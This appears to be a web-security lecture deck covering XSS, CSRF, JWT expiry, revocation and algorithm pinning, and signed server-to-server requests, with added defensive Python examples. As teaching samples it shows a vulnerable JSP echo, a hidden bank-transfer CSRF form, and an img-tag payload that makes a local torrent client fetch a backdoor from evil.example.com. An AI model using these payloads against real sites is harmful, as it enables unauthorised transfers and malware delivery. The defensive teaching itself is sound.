11. Intermezzo: XSS and CSRF
XSS
Someone is able to have their scripts executed as part of your web application.

<% String eid = request.getParameter("eid"); %>
...
Employee ID: <%= eid %>
12. Intermezzo: XSS and CSRF
CSRF
Someone else's web application secretly lets its visitors perform actions with your web application due to cookies still present from previous visits.

<form action="http://bank.com/transfer.do" method="POST">
<input type="hidden" name="acct" value="MARIA"/>
<input type="hidden" name="amount" value="100000"/>
<input type="submit" value="View my pictures"/>
</form>
13. Intermezzo: XSS and CSRF
print "<html>"
print "Latest comment:"
print database.latestComment
print "</html>"
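The two snippets above (the JSP page echoing `eid` and the print statements echoing `database.latestComment`) share one defect: untrusted text is concatenated straight into HTML. The following is an added example, not code from the slides, showing the same page rendered unsafely and with output encoding. The sample comment is constructed for the demo and stands in for `database.latestComment`.

```python
import html

# Constructed stand-in for database.latestComment on the slide (and for the
# "eid" request parameter on the JSP slide): user-controlled text that happens
# to contain markup. The script tag is an inert marker used only to make the
# difference between the two renderers visible.
SAMPLE_COMMENT = 'Great talk! <b>really</b> <script>alert(1)</script>'

def render_unsafe(comment: str) -> str:
    """Equivalent of the slide's print statements: the untrusted string is
    concatenated into the document as-is, so its markup becomes part of the page."""
    return "<html>Latest comment: " + comment + "</html>"

def render_safe(comment: str) -> str:
    """Same page with output encoding for the HTML text-node context: <, >, &
    and both quote characters become entities, so the browser displays the
    comment as text instead of parsing it as markup."""
    return "<html>Latest comment: " + html.escape(comment, quote=True) + "</html>"

def has_raw_script_tag(page: str) -> bool:
    """Check used in the demo: does the rendered page still contain a literal
    <script tag? (A real scanner would parse the HTML; this only shows the effect.)"""
    return "<script" in page.lower()

if __name__ == "__main__":
    print(render_unsafe(SAMPLE_COMMENT))
    print(render_safe(SAMPLE_COMMENT))
```

`html.escape` is correct for text between tags and inside quoted attribute values; the same string placed in an unquoted attribute, a URL, a CSS value or a `<script>` block needs the encoder for that context, which is why templating engines that escape by default are preferable to hand-built string concatenation.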
14. Intermezzo: XSS and CSRF
<img src="http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent">
16. Defence against CSRF is straightforward and durable
1. Check the origin and referer headers
2. Check for some other header you're setting, such as X-Requested-With
See www.owasp.org
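The two checks above, implemented as one server-side function. This is an added example, not code from the deck. The accepted sample uses the `Origin`, `Referer` and `X-Requested-With` values of the `POST /api/session` request shown later in the deck; the cross-site counter-example and the host name `other.example` are constructed.

```python
from urllib.parse import urlsplit

# Constructed sample: the relevant headers of the login request shown later in
# this deck (POST /api/session to 54.194.126.161), sent by the site's own page.
SAME_SITE_HEADERS = {
    "Origin": "http://54.194.126.161",
    "Referer": "http://54.194.126.161/login",
    "X-Requested-With": "XMLHttpRequest",
}

# Constructed counter-example: the same POST triggered from a page on another
# host. The browser reports that page as the Origin and does not add
# X-Requested-With to a plain form submission.
CROSS_SITE_HEADERS = {
    "Origin": "http://other.example",
    "Referer": "http://other.example/page.html",
}

def _host_of(url: str) -> str:
    # urlsplit("null") has an empty netloc, so an opaque "Origin: null" never matches.
    return urlsplit(url).netloc.lower()

def csrf_check(headers: dict, expected_host: str, require_custom_header: bool = True):
    """Return (accepted, reason). The two checks from the slide:
    1. Origin, or Referer when Origin is absent, must name our own host.
    2. The custom header our own scripts set must be present."""
    h = {k.lower(): v for k, v in headers.items()}
    source = h.get("origin") or h.get("referer")
    if not source:
        # Neither header present: we cannot tell where the request came from. Fail closed.
        return False, "no Origin or Referer header"
    if _host_of(source) != expected_host.lower():
        return False, f"request came from {source!r}, not {expected_host!r}"
    if require_custom_header and h.get("x-requested-with") != "XMLHttpRequest":
        return False, "X-Requested-With header missing"
    return True, "ok"
```

Apply the check to state-changing requests only (POST, PUT, DELETE); browsers may omit `Origin` on same-origin GETs and privacy settings may strip `Referer`, so failing closed on a GET would block legitimate users without protecting anything. The custom-header check works because a cross-site form cannot add arbitrary headers, and a cross-origin script that tries to is stopped by the browser's CORS preflight unless the server explicitly allows it.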
17. What happens when I change my password?
{"alg": "HS512"}
{"sub": "1", "admin": false}
HMACSHA256(base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)
18. When should a JWT expire?
As soon as possible, to prevent misuse for long periods
As late as possible, so that users don't have to re-authenticate all the time
19. When should a JWT expire?
Introduce a short-lived token used for authentication per request
Introduce a long-lived token used to generate a new short-lived token when needed
The long-lived token is used in combination with a blacklist of retracted tokens
20. Should I accept all "valid" JWTs?
No, because "none" is a valid algorithm
The key you use to check the signature should match the algorithm
See https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/
21. What happens when I delete my account?
{"alg": "HS512"}
{"sub": "1", "admin": false}
HMACSHA256(base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)
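Slides 17 to 21 make three points about the token above: the signature formula, the need for a short expiry plus a blacklist of retracted tokens (so a password change or account deletion actually takes effect), and the rule that the verifying key must be tied to one algorithm so that `"alg": "none"` or an algorithm mix-up is never accepted. The following added example (not code from the deck) puts all three into one signer and verifier. The secret, the `jti` values and the revocation set are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed values: the deck names the HMAC key only as "secret" and does
# not show a revocation list, so both are invented here for the demo.
SECRET = b"constructed-demo-secret-do-not-reuse"
REVOKED_JTIS = {"tok-1"}   # the slide's blacklist of retracted tokens

# Each verification key is pinned to one algorithm; "none" is not in the map,
# so a token claiming it can never reach the signature check.
ALGORITHMS = {"HS256": hashlib.sha256, "HS512": hashlib.sha512}

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def _segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())

def sign(payload: dict, secret: bytes, alg: str = "HS512") -> str:
    """The slide's formula: HMAC(base64url(header) + "." + base64url(payload), secret)."""
    signing_input = _segment({"alg": alg, "typ": "JWT"}) + "." + _segment(payload)
    mac = hmac.new(secret, signing_input.encode(), ALGORITHMS[alg]).digest()
    return signing_input + "." + b64url_encode(mac)

def none_token(payload: dict) -> str:
    """An unsigned token with alg "none" and an empty signature segment, built
    only to show that verify() refuses it."""
    return _segment({"alg": "none", "typ": "JWT"}) + "." + _segment(payload) + "."

def verify(token: str, secret: bytes, expected_alg: str, revoked: set, now=None) -> dict:
    """Return the payload or raise ValueError. Order of checks: the header
    names exactly the algorithm this key is for, the signature matches, the
    token has not expired, and its jti is not on the revocation list."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    h_b64, p_b64, s_b64 = parts
    header = json.loads(b64url_decode(h_b64))
    if header.get("alg") != expected_alg:           # rejects "none" and HS256/HS512 mix-ups
        raise ValueError(f"unexpected alg {header.get('alg')!r}")
    expected = hmac.new(secret, f"{h_b64}.{p_b64}".encode(), ALGORITHMS[expected_alg]).digest()
    if not hmac.compare_digest(expected, b64url_decode(s_b64)):
        raise ValueError("bad signature")
    payload = json.loads(b64url_decode(p_b64))
    now = time.time() if now is None else now
    if "exp" not in payload or payload["exp"] <= now:  # a short exp bounds the damage window
        raise ValueError("expired or missing exp")
    if payload.get("jti") in revoked:                   # password change / account deletion
        raise ValueError("revoked")
    return payload

def rejection(token: str, secret: bytes, expected_alg: str, revoked: set, now=None) -> str:
    """Convenience wrapper: the reason a token is refused, or "" when accepted."""
    try:
        verify(token, secret, expected_alg, revoked, now)
        return ""
    except ValueError as exc:
        return str(exc)
```

The algorithm is taken from the verifier's configuration, never from the token header; the header is only compared against it. The revocation set is consulted last so a forged or expired token never triggers a lookup, and in the two-token scheme of slide 19 it only has to hold the long-lived tokens, since the short-lived ones expire on their own.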
22. How do I apply this idea to server-to-server communication?
23.
POST /api/session HTTP/1.1
Host: 54.194.126.161
Connection: keep-alive
Content-Length: 31
Accept: */*
Origin: http://54.194.126.161
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) App
Content-Type: application/json
Referer: http://54.194.126.161/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,nl;q=0.6
Cookie: JSESSIONID=37AA2A85693E255315D532C845FDE47B

{"username":"a","password":"a"}
27.
GET ?lifecycle HTTP/1.1
Host: examplebucket.s3.amazonaws.com
Authorization: SignatureToBeCalculated
x-amz-date: 20130524T000000Z
x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e464

GET
/
lifecycle=
host:examplebucket.s3.amazonaws.com
x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e464
x-amz-date:20130524T000000Z

host;x-amz-content-sha256;x-amz-date
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b85
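The slide shows the request and the canonical form it is reduced to, but leaves the signature as `SignatureToBeCalculated`. The added example below (not code from the deck or from AWS) carries the scheme through for exactly this request: it builds the canonical request in the layout shown, derives the signing key from a shared secret, produces the `Authorization` header, and then plays the server side, which recomputes the signature over what it received and rejects tampered or stale requests. The access key, secret, region and service are constructed placeholders; the `x-amz-content-sha256` value is computed from the empty body rather than copied from the slide, where it is cut short.

```python
import hashlib
import hmac
from datetime import datetime, timedelta

# Constructed placeholders: the deck shows the request but not the credentials.
ACCESS_KEY = "AKIDEXAMPLE"           # placeholder access key id
SECRET_KEY = "constructed-secret"    # placeholder shared secret
REGION, SERVICE = "us-east-1", "s3"  # assumed; the slide does not state them
MAX_SKEW = timedelta(minutes=15)     # replay window for x-amz-date

# The request from the slide: GET ?lifecycle on examplebucket with an empty body.
SLIDE_HEADERS = {
    "host": "examplebucket.s3.amazonaws.com",
    "x-amz-date": "20130524T000000Z",
    "x-amz-content-sha256": hashlib.sha256(b"").hexdigest(),
}

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def canonical_request(method, path, query, headers, body):
    """Lay out the request the way the slide does: method, path, query,
    lowercased headers sorted by name (one per line), a blank line, the
    signed-header list, and the hash of the body. Returns (text, signed_headers)."""
    lc = {k.lower(): v.strip() for k, v in headers.items()}
    signed_headers = ";".join(sorted(lc))
    text = "\n".join([
        method, path, query,
        "".join(f"{k}:{lc[k]}\n" for k in sorted(lc)),  # trailing \n gives the blank line
        signed_headers,
        sha256_hex(body),
    ])
    return text, signed_headers

def signing_key(secret, date, region, service):
    """Derive a per-day, per-region, per-service key from the long-lived secret,
    so the secret itself never touches a request."""
    key = hmac.new(("AWS4" + secret).encode(), date.encode(), hashlib.sha256).digest()
    for part in (region, service, "aws4_request"):
        key = hmac.new(key, part.encode(), hashlib.sha256).digest()
    return key

def sign_request(method, path, query, headers, body, secret, region, service):
    """Client side: the Authorization header value that replaces the slide's
    SignatureToBeCalculated placeholder."""
    canon, signed_headers = canonical_request(method, path, query, headers, body)
    amz_date = {k.lower(): v for k, v in headers.items()}["x-amz-date"]
    scope = f"{amz_date[:8]}/{region}/{service}/aws4_request"
    string_to_sign = "\n".join(["AWS4-HMAC-SHA256", amz_date, scope, sha256_hex(canon.encode())])
    sig = hmac.new(signing_key(secret, amz_date[:8], region, service),
                   string_to_sign.encode(), hashlib.sha256).hexdigest()
    return (f"AWS4-HMAC-SHA256 Credential={ACCESS_KEY}/{scope}, "
            f"SignedHeaders={signed_headers}, Signature={sig}")

def verify_request(authorization, method, path, query, headers, body,
                   secret, region, service, now_amz):
    """Server side, after the access key has been mapped to its secret:
    check the body hash, reject timestamps outside the replay window, then
    recompute the signature over the received request and compare it in
    constant time. Returns a reason string, or "" when the request is accepted."""
    lc = {k.lower(): v for k, v in headers.items()}
    if "x-amz-date" not in lc:
        return "missing x-amz-date"
    if sha256_hex(body) != lc.get("x-amz-content-sha256"):
        return "body hash mismatch"
    fmt = "%Y%m%dT%H%M%SZ"
    if abs(datetime.strptime(now_amz, fmt) - datetime.strptime(lc["x-amz-date"], fmt)) > MAX_SKEW:
        return "timestamp outside window"
    expected = sign_request(method, path, query, headers, body, secret, region, service)
    if not hmac.compare_digest(expected.encode(), authorization.encode()):
        return "signature mismatch"
    return ""
```

Contrast with the browser request on slide 23: there the server trusts a cookie the browser attaches automatically, which is what makes CSRF possible. Here nothing is attached automatically; the caller proves possession of the secret per request, the signature covers the host, the date and the body hash, and the date bounds how long a captured request can be replayed.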